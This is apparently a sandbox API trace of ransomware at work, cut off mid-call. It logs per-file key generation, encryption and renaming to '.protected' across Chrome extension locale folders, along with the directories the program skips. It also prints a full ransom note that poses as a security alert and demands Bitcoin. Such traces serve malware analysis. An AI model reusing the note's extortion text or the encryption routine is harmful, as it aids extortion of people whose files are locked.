lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0080.067] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0080.067] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0080.067] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.067] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.068] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.068] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.068] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.068] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.068] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.068] CloseHandle (hObject=0x168) returned 1 [0080.069] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.protected") returned 165 [0080.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.protected")) returned 1 [0080.069] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.069] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.069] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0080.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.070] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.070] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.071] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.071] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.071] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.071] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.071] CloseHandle (hObject=0x164) returned 1 [0080.071] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.071] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0080.071] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0080.071] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0080.071] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0080.071] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0080.071] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he") returned 141 [0080.071] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0080.071] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0080.071] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\*") returned 143 [0080.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.071] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.071] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.071] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.071] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.071] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.071] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\.") returned 143 [0080.071] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.071] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.071] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.072] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.072] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.072] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.072] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.072] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\..") returned 144 [0080.072] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.072] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.072] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.072] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.072] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0080.072] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.072] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.072] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.072] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0080.072] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0080.072] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0080.072] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.072] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xee, lpOverlapped=0x0) returned 1 [0080.073] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.073] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xee, lpOverlapped=0x0) returned 1 [0080.073] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.073] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.073] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.074] CloseHandle (hObject=0x168) returned 1 [0080.074] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.protected") returned 165 [0080.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.protected")) returned 1 [0080.074] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.074] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.074] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\RESTORE_FILES.txt") returned 159 [0080.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.075] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.075] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.075] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.075] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.075] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.075] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.075] CloseHandle (hObject=0x164) returned 1 [0080.075] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.075] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0080.075] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0080.075] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0080.076] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0080.076] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0080.076] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi") returned 141 [0080.076] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0080.076] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0080.076] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\*") returned 143 [0080.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.076] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.076] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.076] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.076] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.076] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.076] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\.") returned 143 [0080.076] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.076] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.076] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.076] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.076] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.076] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.076] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.076] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\..") returned 144 [0080.076] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.076] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.076] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.076] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0080.076] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.076] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.076] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.076] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0080.078] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0080.078] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 